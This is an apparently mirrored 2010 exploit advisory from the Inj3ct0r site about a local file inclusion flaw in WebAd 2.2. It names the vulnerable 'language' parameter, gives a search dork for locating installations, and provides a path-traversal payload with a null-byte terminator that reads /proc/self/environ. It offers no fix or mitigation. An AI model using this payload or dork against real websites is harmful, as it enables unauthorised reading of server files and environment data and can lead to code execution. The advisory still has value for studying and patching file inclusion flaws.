Home / os / win7

WebAd 2.2 Local File Inclusion Vulnerability

Posted on 22 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WebAd 2.2 Local File Inclusion Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ WebAd 2.2 Local File Inclusion Vulnerability ============================================ ########################################### # # Script Name : WebAd 2.2 # # Version : 2.2 / 2010 # # Bug Type : LFI (local file inclusion) # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 21/07/2010 # # Software Link : http://www.diethelm-informatik.ch/index.php?nav=50 # # Dork : WebAd 2.2 - powered by diethelm informatik GmbH # ########################################### PoC : http://[target]/[path]/index.php?language=[LFI] example : http://[target]/[path]/index.php?language=/../../../../../../../proc/self/environ%00 local Example : http://localhost/cms/index.php?language=/../../../../../../../proc/self/environ%00 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP